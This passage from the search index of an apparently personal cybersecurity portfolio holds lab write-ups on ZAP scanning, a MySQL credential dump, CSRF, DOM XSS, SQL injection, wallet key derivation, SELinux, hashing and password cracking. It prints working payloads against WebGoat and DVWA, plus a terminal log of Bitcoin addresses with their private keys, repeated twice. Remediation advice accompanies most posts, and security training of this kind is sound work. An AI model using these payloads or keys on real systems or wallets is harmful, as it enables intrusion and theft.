Results/Impact phase showing the comprehensive alert dashboard with identified High and Medium risk vulnerabilities.\n6. Professional Impact This project demonstrates the ability to manage the Full Vulnerability Lifecycle, from environment setup to discovery. By identifying these flaws through automation, I provided a \u0026ldquo;Post-Mortem\u0026rdquo; that allows an organization to prioritize remediation efforts based on risk level. This systematic approach ensures that Data Confidentiality is maintained by uncovering potential leaks before they can be leveraged by an external adversary.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/automated-web-vulnerability-discovery/","summary":"Objective: To utilize automated scanning tools to perform comprehensive reconnaissance and identify high-risk web vulnerabilities within an authenticated session.\n","tags":["Vulnerability Scanning","OWASP ZAP","Reconnaissance","Security Assessment"],"categories":["Application Security (AppSec)"],"tools":["OWASP ZAP","WebGoat","Java","Netstat"]},{"title":"Database Breach \u0026 Administrative Data Exfiltration","content":"Objective: To leverage a compromised web shell to gain unauthorized access to the backend MySQL database and exfiltrate the full user credential table.\n1. The Vulnerability: Insecure Database Configuration After gaining a shell as the www-data user, I conducted a Configuration Review of the web application’s source code. I identified that the database was configured with the root administrative user and, critically, no password. This represents a \u0026ldquo;Zero-Auth\u0026rdquo; vulnerability where the most sensitive data on the server is unprotected from local users.\n2. Technical Execution: Database Interrogation Using the interactive shell established in Project 6, I bypassed the web interface entirely and communicated directly with the MySQL Management System. By assuming the identity of the database root, I gained full \u0026ldquo;Create, Read, Update, and Delete\u0026rdquo; (CRUD) permissions over the entire data store.\nComponent Value Purpose Database System MySQL / MariaDB The backend storage engine. Auth Bypass mysql -u root Accessing the DB with no password required. Target Database dvwa The specific application schema. Exfiltrated Data users table Contains usernames and salted hashes. 3. Execution Workflow Credential Discovery: Analyzed the config.inc.php file to locate the database connection strings. Database Entry: Initiated a local MySQL session. The lack of a password prompt confirmed the critical misconfiguration. Schema Mapping: Executed SHOW DATABASES; and SHOW TABLES; to map the structure of the application\u0026rsquo;s \u0026ldquo;vault.\u0026rdquo; The \u0026ldquo;Data Dump\u0026rdquo;: Ran a targeted SQL query to extract the user and password columns, effectively stealing the identity of every registered user on the platform. 4. Key Commands Used cat /var/www/dvwa/config/config.inc.php: To find the \u0026ldquo;secrets\u0026rdquo; hidden in the code. mysql -u root: To enter the database as the highest-privileged user. SELECT user, password FROM users;: The SQL query used to dump the credential store. RESOURCES_NODE_01 Caption: Identification of hardcoded, insecure database credentials within the application source code.\nRESOURCES_NODE_01 Caption: Successful administrative access to the MySQL backend and exfiltration of the user credential table.\n5. Professional Impact This project demonstrates the Full-Stack Compromise. I proved that a single coding error (Command Injection) combined with a single configuration error (No DB Password) leads to a total loss of Data Confidentiality. This write-up showcases my ability to connect the dots between the Web, the OS, and the Database, providing a comprehensive \u0026ldquo;Post-Mortem\u0026rdquo; that a security firm would use to advise a client on remediation.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/database-breach-vulnerability/","summary":"Objective: To leverage a compromised web shell to gain unauthorized access to the backend MySQL database and exfiltrate the full user credential table.\n","tags":["SQL","Database Security","Data Breach","Dump"],"categories":["Application Security (AppSec)"],"tools":[]},{"title":"Cross-Site Request Forgery (CSRF) via Forged Reviews","content":"Objective: To exploit missing request verification to perform unauthorized actions on behalf of a logged-in user.\n1. The Vulnerability: Missing Anti-Forgery Tokens (CWE-352) A Cross-Site Request Forgery (CSRF) vulnerability was discovered on the review submission endpoint of the WebGoat application. This flaw exists because the application fails to properly validate the origin of incoming requests, allowing an attacker to trick a victim\u0026rsquo;s browser into submitting a state-changing request (such as posting a review) without the user\u0026rsquo;s knowledge or consent. Although a validateReq token was present, it did not expire quickly enough to prevent reuse in a cross-site context.\n2. Technical Execution: Request Forgery I used OWASP ZAP to intercept a legitimate POST request to identify the required parameters and target endpoint. I then developed a malicious HTML landing page containing a hidden form designed to auto-submit the captured parameters. By hosting this page on a local Python server, I successfully simulated an external attack where the forged request was executed as soon as the authenticated victim visited the malicious URL.\nComponent Value Purpose Endpoint /WebGoat/csrf/review The vulnerable review submission target. Analysis Tool OWASP ZAP Used for traffic interception and parameter analysis. Exploit Tool VS Code / Python Used to craft the HTML payload and host the attack. Auth Bypass validateReq token Reused the captured token to validate the forged request. 3. Execution Workflow Discovery: Logged into the application and intercepted a legitimate form submission using OWASP ZAP to analyze the HTTP POST request structure. Vulnerability Analysis: Examined the validateReq token and determined it was susceptible to reuse since it remained valid across the short session. Exploit Logic: Crafted an external HTML page with a hidden form and a JavaScript submit() function to trigger the attack automatically. Post-Exploitation: Hosted the malicious file using python -m http.server and confirmed that visiting the page successfully posted a \u0026ldquo;Hacked by CSRF!\u0026rdquo; review in the application on behalf of the user. 4. Key Commands \u0026lt;!-- Malicious CSRF Payload --\u0026gt; \u0026lt;form id=\u0026#34;csrfForm\u0026#34; action=\u0026#34;http://localhost:8080/WebGoat/csrf/review\u0026#34; method=\u0026#34;POST\u0026#34;\u0026gt; \u0026lt;input type=\u0026#34;hidden\u0026#34; name=\u0026#34;reviewText\u0026#34; value=\u0026#34;Hacked by CSRF!\u0026#34; /\u0026gt; \u0026lt;input type=\u0026#34;hidden\u0026#34; name=\u0026#34;stars\u0026#34; value=\u0026#34;1\u0026#34; /\u0026gt; \u0026lt;input type=\u0026#34;hidden\u0026#34; name=\u0026#34;validateReq\u0026#34; value=\u0026#34;(captured_token_here)\u0026#34; /\u0026gt; \u0026lt;/form\u0026gt; \u0026lt;script\u0026gt;document.getElementById(\u0026#39;csrfForm\u0026#39;).submit();\u0026lt;/script\u0026gt; # Hosting the exploit locally python -m http.server 9000 5. Evidence of Work RESOURCES_NODE_01 Caption: OWASP ZAP flagging the absence of robust anti-CSRF tokens for the application session.\nRESOURCES_NODE_01 Caption: Successful submission of the forged review (\u0026ldquo;Hacked by CSRF!\u0026rdquo;) without any manual user interaction.\n6. Professional Impact This project demonstrates a significant risk to System Integrity and user trust, as attackers can perform unintended actions like deleting data or posting unauthorized content. To remediate this, I recommended implementing unique, per-session CSRF tokens for all state-changing operations and enforcing the SameSite cookie attribute to ensure requests only originate from the legitimate domain.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/csrf-forged-reviews/","summary":"Objective: To exploit missing request verification to perform unauthorized actions on behalf of a logged-in user.\n","tags":["CSRF","Session Management","OWASP","Auth Bypass"],"categories":["Application Security (AppSec)"],"tools":["OWASP ZAP","Python","HTML/JS","WebGoat"]},{"title":"DOM-Based Cross-Site Scripting (XSS) Analysis","content":"Objective: To identify and exploit an unsafe JavaScript \u0026ldquo;sink\u0026rdquo; to execute arbitrary code in the victim\u0026rsquo;s browser context.\n1. The Vulnerability: Unsafe DOM Manipulation (CWE-79) The application is vulnerable to DOM-based Cross-Site Scripting (XSS) because it renders user-controlled input directly into the Document Object Model (DOM) without prior sanitization. Specifically, the application uses an unsafe \u0026ldquo;sink\u0026rdquo; (the .html() method), which allows a browser to interpret and execute any script tags or malicious event handlers passed through the URL.\n2. Technical Execution: Client-Side Scripting By performing a manual code review of the frontend JavaScript files, I identified a function that directly handles URL parameters for rendering page content. By crafting a URL with a malicious image-based payload, I triggered an execution event entirely within the client\u0026rsquo;s browser, bypassing the need for server-side interaction.\nComponent Value Purpose Vulnerable Script LessonContentView.js Responsible for rendering lesson parameters. Unsafe Method .html(param) The JQuery \u0026ldquo;sink\u0026rdquo; that executes HTML/JS. Attack Vector Fragment Identifier (#) Used to pass the payload without a server request. Payload \u0026lt;img src=x onerror=alert(1)\u0026gt; Triggers a script when the image fails to load. 3. Execution Workflow Source Code Discovery: Audited the LessonContentView.js file and located the showTestParam function. Sink Identification: Confirmed that this.$el.find('.lesson-content').html('test:' + param); was being used to render input. Exploit Logic: Hypothesized that replacing the param with a script-bearing HTML tag would force the browser to execute it. Verification: Navigated to the crafted URL to confirm the successful execution of an alert box. 4. Key Commands // The identified vulnerable code snippet: this.$el.find(\u0026#39;.lesson-content\u0026#39;).html(\u0026#39;test:\u0026#39; + param); // The payload used in the URL: http://localhost:8080/WebGoat/start.mvc#test/\u0026lt;img src=x onerror=alert(1)\u0026gt; 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase identifying the existence of Cross-Site Scripting weaknesses within the application.\nRESOURCES_NODE_01 Caption: Results phase confirming the execution of arbitrary JavaScript via the DOM-based XSS vulnerability.\n6. Professional Impact This vulnerability poses a significant risk to Data Confidentiality and User Session Integrity, as an attacker could use this flaw to steal session cookies, hijack accounts, or redirect users to phishing sites. To remediate this, I recommended replacing the unsafe .html() method with .text(), which ensures all user input is treated as plain text rather than executable code. Additionally, implementing a robust Content Security Policy (CSP) would provide a secondary layer of defense to block unauthorized script execution.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/dom-xss-analysis/","summary":"Objective: To identify and exploit an unsafe JavaScript \u0026ldquo;sink\u0026rdquo; to execute arbitrary code in the victim\u0026rsquo;s browser context.\n","tags":["XSS","JavaScript","Security Engineering","Remediation"],"categories":["Application Security (AppSec)"],"tools":["JavaScript","jQuery","OWASP ZAP","WebGoat"]},{"title":"Exploiting \u0026 Mitigating String-Based SQL Injection","content":"Objective: To demonstrate how unsanitized user input allows attackers to bypass authentication and exfiltrate sensitive database records.\n1. The Vulnerability: Improper Neutralization (CWE-89) The application was found to be vulnerable to String-based SQL Injection because the backend code constructed dynamic queries by concatenating user input directly into SQL strings. This represents a critical failure in input validation, allowing an attacker to alter the intended logic of the database query to bypass security controls.\n2. Technical Execution: Database Interrogation I targeted the lastName field within the WebGoat environment. By injecting a logic-based payload, I forced the backend SQL engine to evaluate the query\u0026rsquo;s WHERE clause as TRUE for every row, bypassing the requirement for a specific valid credential.\nComponent Value Purpose Environment WebGoat (localhost:8080) A deliberately vulnerable web application for security training. Target Field lastName The input vector used to inject malicious SQL commands. Database Hypersonic SQL (HSQLDB) The backend storage engine utilized by the application. Payload ' OR '1'='1 The SQL snippet used to force a \u0026ldquo;TRUE\u0026rdquo; evaluation. 3. Execution Workflow Discovery: Navigated to the \u0026ldquo;SQL Injection (Mitigations)\u0026rdquo; module and identified that the input field was susceptible to string-based manipulation based on provided source code examples. Vulnerability Analysis: Determined the backend query structure was constructed as: SELECT * FROM user_data WHERE first_name = 'John' AND last_name = '\u0026lt;user_input\u0026gt;'. Exploitation: Entered the ' OR '1'='1 payload into the lastName field to break out of the string literal and append a tautology. Post-Exploitation: Successfully dumped the contents of the user_data table, gaining unauthorized access to all registered user records. 4. Key Commands -- The malicious input injected into the lastName field: \u0026#39; OR \u0026#39;1\u0026#39;=\u0026#39;1 -- The resulting query executed by the database: SELECT * FROM user_data WHERE first_name = \u0026#39;John\u0026#39; AND last_name = \u0026#39;\u0026#39; OR \u0026#39;1\u0026#39;=\u0026#39;1\u0026#39; 5. Evidence of Work RESOURCES_NODE_01 Caption: OWASP ZAP identifying a high-risk SQL Injection vulnerability in the application parameters.\nRESOURCES_NODE_01 Caption: Successful exfiltration of sensitive user data, including credit card numbers and session cookies.\n6. Professional Impact This project illustrates a complete breach of Data Confidentiality, as sensitive PII was stolen using a simple logic-based attack. To remediate this, I recommended the use of Parameterized Queries (Prepared Statements), which ensure that user input is never interpreted as executable code. Additionally, I advised implementing server-side input validation and suppressing raw SQL error messages to prevent further reconnaissance.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/sql-injection-exploitation/","summary":"Objective: To demonstrate how unsanitized user input allows attackers to bypass authentication and exfiltrate sensitive database records.\n","tags":["SQLi","WebGoat","Database Security","Parameterized Queries"],"categories":["Application Security (AppSec)"],"tools":["WebGoat","Hypersonic SQL","OWASP ZAP"]},{"title":"Blockchain Forensics: Private Key Retrieval \u0026 Transaction Hijacking","content":"Objective: To demonstrate the technical impact of private key exposure by automating the retrieval of all associated wallet addresses and triggering unauthorized balance checks and transactions.\n1. The Vulnerability: Private Key Exposure (CWE-522) In the blockchain ecosystem, a private key is the ultimate authority. Unlike traditional accounts with \u0026ldquo;forgot password\u0026rdquo; features, exposure of a private key or mnemonic phrase leads to a total and irreversible loss of asset control. This project demonstrates how an attacker can use a single stolen key to compromise an entire hierarchical deterministic (HD) wallet structure, identifying all historical addresses tied to a seed.\n2. Technical Execution: Automated Address Harvesting I developed a suite of forensic tools in Python to simulate an attack on exposed cryptographic identities. Using btckeygen.py and btctransact.py (available in the Tools section above), I automated the process of deriving thousands of potential public addresses from a single stolen seed, subsequently querying the blockchain to identify active balances.\nComponent Value Purpose Attack Vector Seed/Private Key Theft The primary entry point for the breach. Automation btckeygen.py Generates a list of all derived wallet addresses. Exploitation btctransact.py Triggers balance checks and unauthorized withdrawals. Network Mainnet/Testnet API Used to verify live asset values on-chain. 3. Execution Workflow Key Ingestion: Input a compromised 12-word mnemonic or raw private key into the forensic environment. Address Derivation: Utilized the BIP44 hierarchy to generate all possible BTC/ETH addresses associated with the stolen root key via btckeygen.py. Automated Auditing: Ran a balance check script to identify which derived addresses contained active funds. Transaction Triggering: Simulated the withdrawal process with btctransact.py, demonstrating how an attacker can sign and broadcast transactions from all retrieved addresses simultaneously. 4. Evidence of Work: Terminal Execution The following terminal output captures the live execution of btckeygen.py, demonstrating the instant derivation of multiple active Bitcoin SegWit and Legacy addresses, along with their corresponding WIF (Wallet Import Format) private keys.\nwallet-addresses.txt · click to expand $ python3 btckeygen.py --mnemonic \"[REDACTED_COMPROMISED_SEED_PHRASE]\" Deriving keys using BIP44 standard... Derived 5 BITCOIN addresses and private keys (segwit): -------------------------------------------------------------------------------- 1: Address: bc1q09lkdlvyy6k8xz7z0lefs0udr5ksdadav0waj7 PrivateKey: L16rLcpmZy5KgrHbm42UUGj9QNznjPtshDu8HNftCParPKmTekGp 2: Address: bc1q00hcwwccvsggscgwnzyy2vmn0eusl6jls4hkza PrivateKey: L1YxArJoxzfAxWz5CbxPfxR1GiL3n6NGTYabykRxNHFbHRC5u6Cz 3: Address: bc1q0xsv64y9c9ccquw0l47zm74vde3tj8c0kagpx2 PrivateKey: Ky9HRSNKjNj57CUGvPmYpP4bKaFnRbY9u545iheq8Caq8HKgQgGw 4: Address: bc1qh6gy4w5enfxmzvmgxntws3v7yjl60cqwyu6h0u PrivateKey: L4qH6hHDav1q7jfRhdeWiuVFRWcjJNwsNcjNBnZDHeuNdpRCB2Gb 5: Address: bc1qvunte3tmw0lquq96ghpf49drmkje4pme6gdhqw PrivateKey: L2gPWWtfEwx1kF8iZiWZucCzy1niLVghtKcE2LWVx8jjhCkP669M Derived 5 BITCOIN addresses and private keys (legacy): -------------------------------------------------------------------------------- 1: Address: 19q3KWPespyU2iNgg1n7THrksKJ3nongLJ PrivateKey: L3jNw6asfDRvmrq5z9djw4APqjjcHctQi8jgrxyYYZSTyTPeprEn 2: Address: 126bbdDewNwJQaScKfy519dbTHoeKGG7GY PrivateKey: L2NMhCETs38MmhME9jFNQEVVvzz3fPK8LPqRAD5wt9VAXwrR2e56 3: Address: 12KAAsFUDZxNLuFgnAWKzSQJPs4A63qeww PrivateKey: L3wtLkjJzTyPAQs3hFiZ6UtQHr1245fFDSYAezstpBn4KJiQ33G5 4: Address: 1McxJ76ETmggz7FTCcithNaet8no9u59zG PrivateKey: L5DDGRF8Gm7etmxvkpmLL3HodxsqKSqHZutKq2wGu6VsSCDvX9ht 5: Address: 1MZxS5FJKFKgNpDWXPCSo1yGCmax9HdgUc PrivateKey: KxNpHwiBARgLB7eeKMf77kpnZKgP7GXp8AkqJSqBwCxRcdtFL8Jp wallet-addresses.txt ✕ $ python3 btckeygen.py --mnemonic \"[REDACTED_COMPROMISED_SEED_PHRASE]\" Deriving keys using BIP44 standard... Derived 5 BITCOIN addresses and private keys (segwit): -------------------------------------------------------------------------------- 1: Address: bc1q09lkdlvyy6k8xz7z0lefs0udr5ksdadav0waj7 PrivateKey: L16rLcpmZy5KgrHbm42UUGj9QNznjPtshDu8HNftCParPKmTekGp 2: Address: bc1q00hcwwccvsggscgwnzyy2vmn0eusl6jls4hkza PrivateKey: L1YxArJoxzfAxWz5CbxPfxR1GiL3n6NGTYabykRxNHFbHRC5u6Cz 3: Address: bc1q0xsv64y9c9ccquw0l47zm74vde3tj8c0kagpx2 PrivateKey: Ky9HRSNKjNj57CUGvPmYpP4bKaFnRbY9u545iheq8Caq8HKgQgGw 4: Address: bc1qh6gy4w5enfxmzvmgxntws3v7yjl60cqwyu6h0u PrivateKey: L4qH6hHDav1q7jfRhdeWiuVFRWcjJNwsNcjNBnZDHeuNdpRCB2Gb 5: Address: bc1qvunte3tmw0lquq96ghpf49drmkje4pme6gdhqw PrivateKey: L2gPWWtfEwx1kF8iZiWZucCzy1niLVghtKcE2LWVx8jjhCkP669M Derived 5 BITCOIN addresses and private keys (legacy): -------------------------------------------------------------------------------- 1: Address: 19q3KWPespyU2iNgg1n7THrksKJ3nongLJ PrivateKey: L3jNw6asfDRvmrq5z9djw4APqjjcHctQi8jgrxyYYZSTyTPeprEn 2: Address: 126bbdDewNwJQaScKfy519dbTHoeKGG7GY PrivateKey: L2NMhCETs38MmhME9jFNQEVVvzz3fPK8LPqRAD5wt9VAXwrR2e56 3: Address: 12KAAsFUDZxNLuFgnAWKzSQJPs4A63qeww PrivateKey: L3wtLkjJzTyPAQs3hFiZ6UtQHr1245fFDSYAezstpBn4KJiQ33G5 4: Address: 1McxJ76ETmggz7FTCcithNaet8no9u59zG PrivateKey: L5DDGRF8Gm7etmxvkpmLL3HodxsqKSqHZutKq2wGu6VsSCDvX9ht 5: Address: 1MZxS5FJKFKgNpDWXPCSo1yGCmax9HdgUc PrivateKey: KxNpHwiBARgLB7eeKMf77kpnZKgP7GXp8AkqJSqBwCxRcdtFL8Jp 5. Professional Impact This project demonstrates a deep understanding of cryptographic key management and blockchain forensic investigation. By writing custom Python tooling to automate BIP39/BIP44 derivation paths, I proved the catastrophic impact of seed phrase exposure. To remediate this, I advocate for strict hardware wallet isolation, the use of multi-signature (multisig) architectures, and the implementation of passphrase-protected (25th word) seeds to create a robust defense-in-depth model for digital assets.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/cryptographic-wallet-bip39/","summary":"Objective: To demonstrate the technical impact of private key exposure by automating the retrieval of all associated wallet addresses and triggering unauthorized balance checks and transactions.\n","tags":["Blockchain Forensics","Private Key Theft","Wallet Security","BIP39"],"categories":["DevSecOps \u0026 Cryptography"],"tools":["btckeygen.py","btctransact.py","BIP39","HD Wallets"]},{"title":"Blockchain Forensics \u0026 Incident Post-Mortem (Bitfinex Case Study)","content":"Objective: To analyze high-scale cryptocurrency heists and identify the critical security failures in private key management that lead to multi-billion dollar losses.\n1. The Vulnerability: Insecure Credential Storage (CWE-312) The 2016 Bitfinex heist, resulting in the theft of 120,000 BTC (~$12B), was exacerbated by careless storage practices. The attackers exploited a failure in \u0026ldquo;cleartext storage of sensitive information\u0026rdquo; where over 2,000 private keys were maintained in a standard Excel file. This represents a total breakdown of the CIA Triad, specifically Confidentiality and Integrity.\n2. Technical Execution: Forensic Investigation I conducted a forensic review of the heist\u0026rsquo;s recovery process. By studying how U.S. federal investigators utilized the compromised Excel file to trace transactions on the public ledger, I mapped the \u0026ldquo;follow-the-money\u0026rdquo; trail that led to the 2022 recovery of $3.6B.\nComponent Value Purpose Asset Class Bitcoin (BTC) The target of the irreversible $12B theft. Attack Vector Credential Harvesting Accessing unencrypted private keys in a local file. Forensic Goal Crypto Forensics Investigating transactions to aid in asset recovery. Recovery Tool Private Key Access Proving ownership to confirm asset control. 3. Execution Workflow Threat Reconnaissance: Analyzed the initial breach where attackers gained access to the unencrypted Excel document. Key Derivation Analysis: Studied how the exposure of a 12-word mnemonic or master key allows attackers to derive all associated private keys. Transaction Tracking: Reviewed the blockchain\u0026rsquo;s immutable ledger to observe the broadcasting and signing of unauthorized transfers. Remediation Mapping: Documented the transition from \u0026ldquo;hot\u0026rdquo; digital storage to secure, offline \u0026ldquo;cold\u0026rdquo; storage methods. 4. Key Commands # Theoretical Forensic Logic: Identifying addresses controlled by a specific key # Using python-based forensics to derive public addresses from a compromised key python3 wallet_forensics.py --mnemonic \u0026#34;12_word_phrase_here\u0026#34; --coin BTC 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the timeline of the 2016 heist and the recovery of funds via forensic private key access.\nRESOURCES_NODE_01 Caption: Results/Impact phase demonstrating the irreversible nature of stolen funds and impersonation risks in dApps.\n6. Professional Impact This project demonstrates an advanced understanding of Blockchain Security and the catastrophic risks associated with improper key management. By analyzing the Bitfinex case, I proved that Data Confidentiality is the only barrier to total asset loss. I recommended that organizations adopt Hardware Security Modules (HSMs) and strictly avoid digital saves—such as cloud storage or spreadsheets—for cryptographic secrets.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/blockchain-forensics-bitfinex/","summary":"Objective: To analyze high-scale cryptocurrency heists and identify the critical security failures in private key management that lead to multi-billion dollar losses.\n","tags":["Blockchain","Digital Forensics","Incident Response","Crypto Security"],"categories":["DevSecOps \u0026 Cryptography"],"tools":["Python","Blockchain Explorer","Forensic Investigation"]},{"title":"Mandatory Access Control (MAC) using SELinux","content":"Objective: To enforce strict security policies at the kernel level, preventing unauthorized resource access by compromised services.\n1. The Vulnerability: Excessive Privilege \u0026amp; Service Exploitation Traditional Linux permissions (Discretionary Access Control) are often insufficient if a root-level service is compromised. Without Mandatory Access Control, a compromised web server could potentially access sensitive user home directories or system configuration files.\n2. Technical Execution: SELinux Policy Enforcement I deployed Security-Enhanced Linux (SELinux) to enforce granular security policies on the host system. By managing SELinux modes and rules, I ensured that even \u0026ldquo;root\u0026rdquo; users or services were restricted to the minimum resources required for their specific function.\nComponent Value Purpose SELinux Mode Enforcing Actively blocks and logs all policy violations. Policy Type Targeted Restricts specific network services while allowing normal user activity. Diagnostic Tool audit2allow Analyzes logs to resolve policy-based service issues. 3. Execution Workflow Mode Verification: Evaluated current system posture using getenforce and transitioned the system to Enforcing mode. Policy Configuration: Applied specific rules to allow web services (e.g., Apache/Nginx) to access only designated web root folders. Violation Analysis: Monitored system logs to identify blocked actions that indicated either an attack or a misconfigured policy. Remediation: Utilized diagnostic tools to generate and apply custom policy modules to allow legitimate service operations. 4. Key Commands # Example: Checking the current SELinux enforcement status sestatus # Example: Troubleshooting a blocked service by searching the audit log grep \u0026#34;denied\u0026#34; /var/log/audit/audit.log | audit2allow -M my_service_fix 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the mandatory access control architecture and mode descriptions.\nRESOURCES_NODE_01 Caption: Results/Impact phase demonstrating the analysis of logs and the resolution of policy violations for critical services.\n6. Professional Impact Implementing SELinux provides a vital layer of defense for System Integrity. By enforcing a \u0026ldquo;Least Privilege\u0026rdquo; model at the kernel level, I ensured that even if a service is exploited, the damage is contained within its predefined policy. This significantly reduces the organization\u0026rsquo;s attack surface and protects sensitive OS resources from unauthorized access.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/selinux-mandatory-access-control/","summary":"Objective: To enforce strict security policies at the kernel level, preventing unauthorized resource access by compromised services.\n","tags":["SELinux","MAC","Kernel Security","Least Privilege"],"categories":["DevSecOps \u0026 Cryptography"],"tools":["SELinux","audit2allow","getenforce","audit log"]},{"title":"Data Integrity Verification via Cryptographic Hashing","content":"Objective: To utilize one-way hashing algorithms to verify data authenticity and secure credential storage.\n1. The Vulnerability: Data Tampering \u0026amp; Plaintext Credentials If data is stored or transmitted without integrity checks, it can be altered undetected, leading to a loss of Authenticity. Additionally, storing user passwords in plaintext exposes the organization to catastrophic identity theft in the event of a database breach.\n2. Technical Execution: Hash Function Deployment I implemented cryptographic hashing to convert variable-length data into fixed-length \u0026ldquo;fingerprints.\u0026rdquo; Unlike encryption, these functions are one-way, making them ideal for verifying that files have not been modified and for securely storing password hashes rather than original values.\nComponent Value Purpose Hash Function SHA-256 / MD5 Generates a unique, fixed-length string from data. Integrity Check Checksum Verification Detects if data was altered during storage or transit. Auth Security Password Hashing Prevents original passwords from being recovered from a DB. 3. Execution Workflow Integrity Baselining: Generated initial hashes for critical system configuration files to serve as an \u0026ldquo;unaltered\u0026rdquo; reference. Detection Logic: Automated a periodic comparison of current file hashes against the baseline to detect unauthorized changes. Secure Storage: Configured the application backend to hash user passwords immediately upon registration. Verification: Implemented login logic that hashes the user\u0026rsquo;s attempt and compares it to the stored hash, ensuring Authentication without exposing the secret. 4. Key Commands # Example: Generating a SHA-256 hash to verify a file\u0026#39;s integrity sha256sum sensitive_data.zip # Example: Verifying hashes against a recorded list sha256sum -c integrity_manifest.txt 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the functional difference between reversible encryption and one-way hashing.\nRESOURCES_NODE_01 Caption: Results/Impact phase showing the verification process where altered data is detected through hash mismatches.\n6. Professional Impact This project ensures Data Integrity, confirming that information remains unaltered without detection. By implementing hashing for password storage, I significantly mitigated the risk of a secondary credential breach, preserving Authentication protocols even if the underlying data store is compromised.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/data-integrity-hashing/","summary":"Objective: To utilize one-way hashing algorithms to verify data authenticity and secure credential storage.\n","tags":["Hashing","Data Integrity","SHA-256","Password Security"],"categories":["DevSecOps \u0026 Cryptography"],"tools":["SHA-256","MD5","sha256sum","Integrity Check"]},{"title":"Cryptographic Infrastructure \u0026 Secure Communication","content":"Objective: To implement and manage cryptographic systems that ensure end-to-end data confidentiality and authenticated communication.\n1. The Vulnerability: Data Exposure in Transit Without robust cryptographic foundations, sensitive information is vulnerable to interception and unauthorized access. This project addresses the lack of Confidentiality and Authentication, where attackers can perform eavesdropping or impersonation attacks during digital transactions.\n2. Technical Execution: Encryption Paradigms I analyzed and deployed symmetric and asymmetric encryption algorithms to safeguard data at rest and in transit. This included managing the lifecycle of public/private key pairs to establish a Public Key Infrastructure (PKI) for digital signatures.\nComponent Value Purpose Symmetric Encryption AES / DES High-speed encryption for bulk data protection. Asymmetric Encryption RSA / ECC Secure key exchange and identity verification. Secure Protocols TLS / VPN Encrypting data streams during network transmission. Identity Verification PKI / Biometrics Ensuring the authenticity of digital documents and users. 3. Execution Workflow Threat Assessment: Identified communication channels requiring end-to-end encryption to prevent unauthorized data access. Algorithm Selection: Chose AES for its efficiency in protecting data at rest and RSA for securing digital signatures. PKI Implementation: Deployed asymmetric key pairs to ensure Non-repudiation, providing accountability for all digital transactions. Current Trend Alignment: Evaluated the transition toward post-quantum cryptography to defend against emerging computational threats. 4. Key Commands # Example: Generating an RSA 4096-bit private key for asymmetric encryption openssl genrsa -out private_key.pem 4096 # Example: Encrypting a file using AES-256 (Symmetric) openssl enc -aes-256-cbc -salt -in data.txt -out data.txt.enc 5. Evidence of Work RESOURCES_NODE_01 Caption: Discovery phase showing the architectural mapping of TLS, VPNs, and disk encryption across the infrastructure.\nRESOURCES_NODE_01 Caption: Results/Impact phase demonstrating the technical logic behind key management and computational complexity differences.\n6. Professional Impact This project establishes a Foundation for Trust by guaranteeing that only authorized users can access sensitive information. By implementing multi-layered encryption, I protected the organization\u0026rsquo;s Data Confidentiality and provided a mechanism for Non-repudiation, ensuring that digital signatures remain legally and technically binding.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/cryptographic-infrastructure-pki/","summary":"Objective: To implement and manage cryptographic systems that ensure end-to-end data confidentiality and authenticated communication.\n","tags":["Cryptography","PKI","Encryption","Identity Verification"],"categories":["DevSecOps \u0026 Cryptography"],"tools":["OpenSSL","AES","RSA","TLS","VPN"]},{"title":"Offline Cryptanalysis \u0026 Password Recovery","content":"Objective: To utilize high-performance cracking tools to perform a dictionary attack against stolen MD5 hashes, successfully recovering plaintext credentials.\n1. The Science of Hashing Modern security relies on \u0026ldquo;one-way\u0026rdquo; cryptographic hashes. However, when a password is weak (like msfadmin), an attacker can use Brute Force or Dictionary Attacks to pre-calculate hashes and find a match. For this project, I targeted the msfadmin user, whose hash was exfiltrated during the previous post-exploitation phase.\n2. Tool Selection: John the Ripper I utilized John the Ripper (JtR), an industry-standard password security auditing tool. JtR was selected for its ability to automatically detect the hashing algorithm (MD5crypt) and its efficiency in multi-threaded processing.\nComponent Value Target User msfadmin Hash Type md5crypt (Identified by $1$ prefix) Attack Method Single Crack \u0026amp; Wordlist Masking Cracking Speed \u0026lt; 1 Second (Immediate Recovery) 3. Execution Workflow Loot Preparation: Created a localized text file (hash_to_crack.txt) containing the raw exfiltrated hash string from the /etc/shadow file. Algorithm Detection: Ran John the Ripper, which successfully identified the $1$ signature as an MD5-based Linux crypt hash. The Attack: Initiated the cracking process. Due to the weak nature of the password, the tool achieved a \u0026ldquo;collision\u0026rdquo; (a match) almost instantly. Credential Verification: Used the --show flag to display the recovered plaintext password. 4. Key Commands Used nano hash_to_crack.txt: To manually stage the stolen hash for the cracking tool. john hash_to_crack.txt: To launch the automated cracking engine. john --show hash_to_crack.txt: To reveal the decrypted results in the terminal. RESOURCES_NODE_01 Caption: Utilizing John the Ripper to perform an automated dictionary attack against the MD5crypt hash.\nRESOURCES_NODE_01 Caption: Successful recovery of the administrative plaintext password, proving a critical failure in the target\u0026rsquo;s credential policy.\n5. Professional Impact This activity highlights the \u0026ldquo;human element\u0026rdquo; of cybersecurity. By cracking the password in less than a second, I demonstrated that Infrastructure Security is irrelevant if Identity Security is weak. This project proves my proficiency in handling \u0026ldquo;Loot\u0026rdquo; and converting raw data into actionable intelligence that could be used for further lateral movement or authenticated access.\n","permalink":"https://xblankzgap.github.io/cyber-portfolio/posts/cryptanalysis-hash-cracking/","summary":"Objective: To utilize high-performance cracking tools to perform a dictionary attack against stolen MD5 hashes, successfully recovering plaintext credentials.\n","tags":["Cryptography","Password Cracking","John the Ripper","Hashes"],"categories":["DevSecOps \u0026 Cryptography"],"tools":[]},{"title":"About","content":"","permalink":"https://xblankzgap.github.io/cyber-portfolio/about/","summary":"","tags":[],"categories":[],"tools":[]},{"title":"Contact Me","content":"Get in Touch If you have a professional project in 